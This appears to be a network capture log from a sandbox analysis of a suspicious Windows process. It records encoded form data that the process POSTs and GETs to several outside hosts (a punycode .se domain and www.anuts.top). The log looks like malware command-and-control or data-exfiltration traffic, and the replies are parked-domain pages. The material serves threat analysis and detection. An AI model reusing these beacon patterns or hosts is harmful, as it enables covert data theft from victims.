Aug 12, 2024 05:14:56.999478102 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 03:14:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 12, 2024 05:14:56.999519110 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 12, 2024 05:14:56.999552011 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 12, 2024 05:14:56.999583006 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 12, 2024 05:14:56.999618053 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49754	194.9.94.85	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:58.900903940 CEST	10894	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 6a 74 76 62 43 57 66 6b 30 6a 77 6b 4d 46 67 55 42 69 75 6c 71 34 58 59 33 38 57 53 2b 76 51 4f 53 6d 43 58 41 74 6b 4c 33 43 6f 38 6e 55 32 68 4a 51 73 7a 72 65 35 33 41 72 42 74 7a 32 32 64 2b 72 6e 78 4b 43 67 2b 66 4b 55 76 66 4a 70 41 6a 7a 54 7a 55 69 57 5a 31 4c 53 55 38 73 45 61 58 4b 6b 41 51 43 59 4c 33 6a 4e 35 4f 76 51 69 37 69 50 49 4a 35 51 4f 6e 6c 52 75 55 56 4e 76 36 6c 57 39 73 52 6a 4e 49 4f 73 67 47 4b 31 52 32 52 39 32 56 54 66 30 78 45 44 7a 68 53 64 32 63 46 79 72 65 6f 72 38 4e 62 37 79 50 6d 65 6d 33 2f 67 39 6b 52 5a 36 38 36 4f 59 64 4e 42 77 5a 6d 79 6a 35 78 33 51 2b 79 77 30 51 6e 6d 66 64 70 46 41 75 46 70 58 42 32 45 51 31 78 62 59 72 31 66 59 2b 45 6b 45 46 66 33 51 54 58 69 70 4b 35 69 6b 2f 52 74 4a 49 66 58 53 2b 76 64 53 32 52 6b 75 64 67 6f 30 6c 6e 6a 6b 6c 67 7a 43 32 6e 32 49 4b 30 5a 32 46 62 6e 75 5a 49 6b 68 77 77 2f [TRUNCATED] Data Ascii: YXDT=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boFjtvbCWfk0jwkMFgUBiulq4XY38WS+vQOSmCXAtkL3Co8nU2hJQszre53ArBtz22d+rnxKCg+fKUvfJpAjzTzUiWZ1LSU8sEaXKkAQCYL3jN5OvQi7iPIJ5QOnlRuUVNv6lW9sRjNIOsgGK1R2R92VTf0xEDzhSd2cFyreor8Nb7yPmem3/g9kRZ686OYdNBwZmyj5x3Q+yw0QnmfdpFAuFpXB2EQ1xbYr1fY+EkEFf3QTXipK5ik/RtJIfXS+vdS2Rkudgo0lnjklgzC2n2IK0Z2FbnuZIkhww/nkWim2hmqaT2OphONFeQMYrNBQ1VrkZqo5Fe+PIblPuXmZOwytYQ6Uzw2YGRa/rzQ+dYkLieKKzvIDTPNaHI4sLbLzerzUNaC0/MVLZT37ySpk5CXopLFmdJfVhRcwa4qnf3Z6XHe1RCxMgt+O2tzA/SU7bYvVWcJwysssdO9TPcuF+murPDQHN0WpQdiiJjNew1/U7+BqVoEXIhYW83o/ZXFh9UcKO3+MYz+199jGUI+2blszQQQqrHxvao5WCZNsaGcqOAYVbgQWlTOpTAtp5yMbe29opIqDFrLL0sQLelAjXBT2Cy7EQP2ELzdMPouQkwvUufwxyOTtHhqfqp9MFXVTJc7N0c2123UN7gN8ZctWHe1nIqZN6OTm6yw9UDiknTs8Edr/Zp69waFmdsZIKYSvqNY60QLu4zOXeD9eCtTRa/2DrQ9DBilsmrNaF5rf/0jUcFYokV5aQtfoAX1ROpqBSCH4d3SemCk3f/HHb77DqCufk35+CnN0K/7B4t8cTKAlFTUlFarlhLHYXKb/jWluD/IzP++JQL1qnziFXnhG1jiYS8pRwSEcmF/R4A5IMYKSCSwFXEjRN6uHopYIaXiopH1GgvaF0kx8a5D2ypsRvcFtUvBAAlv62+6uXWdW0eHXhBVRyuISs0NkBNwQ37x5v0LLr25X [TRUNCATED]
Aug 12, 2024 05:14:59.550528049 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 03:14:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 12, 2024 05:14:59.550597906 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 12, 2024 05:14:59.550648928 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 12, 2024 05:14:59.550678968 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 12, 2024 05:14:59.550715923 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49755	194.9.94.85	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:01.431474924 CEST	508	OUT	GET /4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6h HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.xn--matfrmn-jxa4m.se Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:15:02.090054989 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 03:15:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 66 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a 3d [TRUNCATED] Data Ascii: fb4<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution: [TRUNCATED]
Aug 12, 2024 05:15:02.090114117 CEST	1236	IN	Data Raw: 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 Data Ascii: /responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1
Aug 12, 2024 05:15:02.090151072 CEST	1236	IN	Data Raw: 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 Data Ascii: m_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="http
Aug 12, 2024 05:15:02.090183020 CEST	1236	IN	Data Raw: 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 Data Ascii: " placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 12, 2024 05:15:02.090220928 CEST	884	IN	Data Raw: 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 Data Ascii: pia_parkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49756	23.251.54.212	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:07.689435959 CEST	759	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 38 4e 56 59 46 37 36 7a 48 74 43 32 4e 56 42 6d 44 45 34 6b 37 54 45 67 59 4a 75 4e 77 4d 45 48 51 3d 3d Data Ascii: YXDT=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l38NVYF76zHtC2NVBmDE4k7TEgYJuNwMEHQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49757	23.251.54.212	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:10.233745098 CEST	779	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 33 33 39 66 41 61 41 7a 78 4e 63 57 73 66 66 4b 42 45 6e 70 58 4e 38 42 67 2b 58 39 66 65 52 6f 4d 3d Data Ascii: YXDT=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27339fAaAzxNcWsffKBEnpXN8Bg+X9feRoM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49758	23.251.54.212	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:15:12.761729956 CEST	10861	OUT	POST /li0t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.anuts.top Origin: http://www.anuts.top Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.anuts.top/li0t/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6b 41 6e 35 38 46 54 6a 41 78 75 71 34 50 65 75 4e 34 62 4d 42 70 67 58 55 4a 67 58 62 68 38 38 72 58 6e 38 68 4e 4d 4e 65 72 41 4e 74 46 36 50 68 6e 36 66 6f 53 68 53 6a 65 79 70 4f 35 39 72 30 35 52 39 64 46 6c 75 37 47 76 67 4e 45 49 66 54 45 35 50 6d 42 33 74 6a 2b 49 57 78 6f 74 52 75 35 42 6d 49 71 68 6b 4e 72 46 77 2b 70 79 61 4a 61 47 6b 32 38 6a 4a 42 78 6f 2b 53 35 7a 6c 6d 52 78 6e 58 32 30 77 7a 58 63 61 56 78 59 70 45 48 33 4c 6d 69 49 68 36 63 66 6a 78 63 67 76 6e 77 43 52 [TRUNCATED] Data Ascii: 